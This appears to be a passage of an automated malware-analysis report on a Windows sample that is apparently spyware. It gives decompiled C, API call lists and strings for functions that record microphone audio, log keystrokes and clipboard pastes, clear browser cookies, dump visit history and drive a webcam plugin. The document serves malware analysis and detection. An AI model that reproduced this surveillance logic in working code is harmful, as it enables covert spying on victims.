                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,0041B1E8,0000005C,00000000,.wav), ref: 004016C4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004016D1
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004016DE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004016EA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016F3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016FC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401705
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 0040170E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401717
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B1A0,?,?,?,?,?,?,?,00000000,.wav), ref: 00401726
                                    • Part of subcall function 004013BE: CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                  • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040173D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401748
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040177C
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040178B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401795
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                  • String ID: %Y-%m-%d %H.%M$.wav
                                  • API String ID: 4079669728-3597965672
                                  • Opcode ID: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                  • Instruction ID: bf0964d1dea1fddfd3b2107398812174aa57f11fbff5416b66007043dfe7270a
                                  • Opcode Fuzzy Hash: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                  • Instruction Fuzzy Hash: C641F87180060DEFDB00EBA0EC5DADE7B79EB48345F448036F505E71A0EB746689CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E004013BE(long _a4, void** _a8) {
                                  				void _v8;
                                  				void _v12;
                                  				void _v16;
                                  				void _v20;
                                  				void _v24;
                                  				void _v28;
                                  				signed int _t37;
                                  				signed int _t41;
                                  				void* _t82;
                                  				signed int _t83;
                                  				signed int _t89;
                                  
                                  				_t83 = E0041B21A & 0x0000ffff;
                                  				_t37 = (E0041B226 & 0x0000ffff) * _t83;
                                  				_v20 = _t37 * E0041B21C >> 3;
                                  				asm("cdq");
                                  				_t89 = 8;
                                  				_v16 = 1;
                                  				_v12 = 0x10;
                                  				_v24 = _t37 / _t89;
                                  				_t41 = _a8[1] * _t83;
                                  				_v28 = _t41;
                                  				_v8 = _t41 + 0x24;
                                  				_t82 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
                                  				if(_t82 != 0xffffffff) {
                                  					WriteFile(_t82, "RIFF", 4,  &_a4, 0);
                                  					WriteFile(_t82,  &_v8, 4,  &_a4, 0);
                                  					WriteFile(_t82, "WAVE", 4,  &_a4, 0);
                                  					WriteFile(_t82, "fmt ", 4,  &_a4, 0);
                                  					WriteFile(_t82,  &_v12, 4,  &_a4, 0);
                                  					WriteFile(_t82,  &_v16, 2,  &_a4, 0);
                                  					WriteFile(_t82,  &E0041B21A, 2,  &_a4, 0);
                                  					WriteFile(_t82,  &E0041B21C, 4,  &_a4, 0);
                                  					WriteFile(_t82,  &_v20, 4,  &_a4, 0);
                                  					WriteFile(_t82,  &_v24, 2,  &_a4, 0);
                                  					WriteFile(_t82,  &E0041B226, 2,  &_a4, 0);
                                  					WriteFile(_t82, "data", 4,  &_a4, 0);
                                  					WriteFile(_t82,  &_v28, 4,  &_a4, 0);
                                  					WriteFile(_t82,  *_a8, _a8[1],  &_a4, 0);
                                  					CloseHandle(_t82);
                                  					return 1;
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,00000010,00000000,?,0041B1A0), ref: 0040144B
                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000010,00000000,?,0041B1A0), ref: 00401459
                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000010,00000000,?,0041B1A0), ref: 00401468
                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000010,00000000,?,0041B1A0), ref: 00401477
                                  • WriteFile.KERNEL32(00000000,00000010,00000004,00000010,00000000,?,0041B1A0), ref: 00401485
                                  • WriteFile.KERNEL32(00000000,00000001,00000002,00000010,00000000,?,0041B1A0), ref: 00401493
                                  • WriteFile.KERNEL32(00000000,0041B21A,00000002,00000010,00000000,?,0041B1A0), ref: 004014A2
                                  • WriteFile.KERNEL32(00000000,0041B21C,00000004,00000010,00000000,?,0041B1A0), ref: 004014B1
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014BF
                                  • WriteFile.KERNEL32(00000000,?,00000002,00000010,00000000,?,0041B1A0), ref: 004014CD
                                  • WriteFile.KERNEL32(00000000,0041B226,00000002,00000010,00000000,?,0041B1A0), ref: 004014DC
                                  • WriteFile.KERNEL32(00000000,data,00000004,00000010,00000000,?,0041B1A0), ref: 004014EB
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014F9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Write$Create
                                  • String ID: RIFF$WAVE$data$fmt
                                  • API String ID: 1602526932-4212202414
                                  • Opcode ID: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                  • Instruction ID: 91b5b913efd348db76e64cf746c5e08b94ff9205a7cc9a5ceb03776573d28bcb
                                  • Opcode Fuzzy Hash: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                  • Instruction Fuzzy Hash: 6F411CB654021CBAD7109BA1DC89FEB7FBCEBC5B10F008416BA06EA181D674D744CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                    • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                    • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                    • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                    • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • Sleep.KERNEL32(000000FA), ref: 00401C24
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401C52
                                  Strings
                                  • /sort "Visit Time" /stext ", xrefs: 00401B97
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@2@@std@@D@std@@$??1?$basic_string@G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@$D@1@@G@2@@0@Hstd@@V?$basic_string@$FileV01@@rand$CreateG@1@@ModuleNameSleepV01@V10@V10@0@V10@@Y?$basic_string@srandtime
                                  • String ID: /sort "Visit Time" /stext "
                                  • API String ID: 1247708949-1573945896
                                  • Opcode ID: bae4231b7ad8b89fc812ac0498ce92f67c75d04b095d5612855b5cb53df7ea03
                                  • Instruction ID: 821258ceffa38abf0b50ebb2211f36aec7c07e94205cba95cd2ca02b6bdb4f84
                                  • Opcode Fuzzy Hash: bae4231b7ad8b89fc812ac0498ce92f67c75d04b095d5612855b5cb53df7ea03
                                  • Instruction Fuzzy Hash: B131127290050DEBCB04EBE0ED4D9DE777CEB58345F104036F902E7090EA759A49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B9C,?,00000000,?,745E73F0,?), ref: 0040697B
                                  • toupper.MSVCRT ref: 0040698A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 0040699E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004069A9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069C5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069CE
                                  • toupper.MSVCRT ref: 00406A61
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004069B3
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                    • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                    • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 004069D7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A01
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A0B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A1D
                                  • tolower.MSVCRT ref: 00406A3A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00406ABF
                                  Strings
                                  • [End of clipboard text], xrefs: 004069EC
                                  • [Ctrl + , xrefs: 00406996
                                  • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 004069FB
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                  • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                  • API String ID: 1567161615-398269065
                                  • Opcode ID: 7bcb2ca4d05078fcc67478024d11bb5d070264c80da8943c36bc5bf97b2b720a
                                  • Instruction ID: a9543fe512128afdcb68fc0767362bf76cb8ddc06e86ce3b10f85a644f0edd6d
                                  • Opcode Fuzzy Hash: 7bcb2ca4d05078fcc67478024d11bb5d070264c80da8943c36bc5bf97b2b720a
                                  • Instruction Fuzzy Hash: 1141D571904708FBCB14F7E8E8499EFBB7CAB81300B14447BF403B3191DA795A598B5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                    • Part of subcall function 0040B522: RegOpenKeyExA.KERNEL32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                    • Part of subcall function 0040B522: RegQueryValueExA.KERNEL32(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                    • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                    • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 004077E7
                                  • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 004077EE
                                  • PathFileExistsA.SHLWAPI(?), ref: 004077FB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 0040781D
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407834
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                    • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                    • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                    • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407846
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040784F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000), ref: 00407884
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 0040789E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@D@1@@$wcscpy$FileFindwcscat$?begin@?$basic_string@?c_str@?$basic_string@CloseDirectoryRemoveV01@@$??4?$basic_string@??8std@@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@D@2@@0@EnvironmentExistsExpandFirstG@1@@NextOpenPathQueryStringsV01@V?$basic_string@Value
                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                  • API String ID: 4038348890-4073444585
                                  • Opcode ID: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                  • Instruction ID: e1c57ca4753d391c226bd1858ab1e9d7f4a425f5166415fba7c1daa74d5850da
                                  • Opcode Fuzzy Hash: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                  • Instruction Fuzzy Hash: 0F317F72904609EBCB00FBE0DD89DEE777CEB44345B104076F412A3190EB75AA49CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 19%
                                  			E00401CCF(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
                                  				char _v20;
                                  				char _v36;
                                  				void* __ebp;
                                  				void* _t22;
                                  				void* _t23;
                                  				void* _t32;
                                  				char* _t33;
                                  				void* _t36;
                                  				void* _t38;
                                  				signed char _t39;
                                  				signed char _t41;
                                  				char* _t42;
                                  				int _t43;
                                  				intOrPtr _t65;
                                  				signed char _t66;
                                  				void* _t68;
                                  				intOrPtr* _t71;
                                  
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t65 =  *__eax;
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				_t71 = _t68 + 0x24;
                                  				_t22 = _t65 - 0x3c;
                                  				if(_t22 == 0) {
                                  					_t23 = E0040180C( &_v20, __eflags, 0);
                                  					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					_t66 = E00406DD9(_t23);
                                  					__eflags = _t66;
                                  					if(_t66 != 0) {
                                  						 *0x41b2ec = E00407033(_t66, "OpenCamera");
                                  						 *0x41b2f0 = E00407033(_t66, "CloseCamera");
                                  						 *0x41b2f4 = E00407033(_t66, "GetFrame");
                                  						 *0x41b2f8 = E00407033(_t66, "FreeFrame");
                                  						 *0x41b2e8 = 1;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
                                  						_push(0x1b);
                                  						goto L15;
                                  					}
                                  				} else {
                                  					_t32 = _t22 - 1;
                                  					if(_t32 == 0) {
                                  						__eflags =  *0x41b2e9;
                                  						if(__eflags != 0) {
                                  							goto L8;
                                  						}
                                  					} else {
                                  						_t36 = _t32 - 1;
                                  						if(_t36 == 0) {
                                  							 *0x41b2f0();
                                  							 *0x41b2e9 =  *0x41b2e9 & 0x00000000;
                                  						} else {
                                  							_t38 = _t36 - 1;
                                  							if(_t38 == 0) {
                                  								_t39 =  *0x41b2ec();
                                  								__eflags = _t39;
                                  								 *0x41b2e9 = _t39;
                                  								if(__eflags == 0) {
                                  									goto L9;
                                  								} else {
                                  									L8:
                                  									_t33 = E0040180C( &_v20, __eflags, 0);
                                  									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  									_push(atoi(_t33));
                                  									_push(_a4);
                                  									E00401EA2(__eflags);
                                  								}
                                  							} else {
                                  								if(_t38 == 1) {
                                  									_t41 =  *0x41b2ec();
                                  									_t81 = _t41;
                                  									 *0x41b2e9 = _t41;
                                  									if(_t41 == 0) {
                                  										L9:
                                  										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
                                  										_push(0x41);
                                  										L15:
                                  										E004020C2(_a4);
                                  									} else {
                                  										_t42 = E0040180C( &_v20, _t81, 0);
                                  										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  										_t43 = atoi(_t42);
                                  										 *_t71 = 0x3e8;
                                  										Sleep(??);
                                  										E00401EA2(_t81);
                                  										 *0x41b2f0(_a4, _t43);
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				E004017DD( &_v20);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
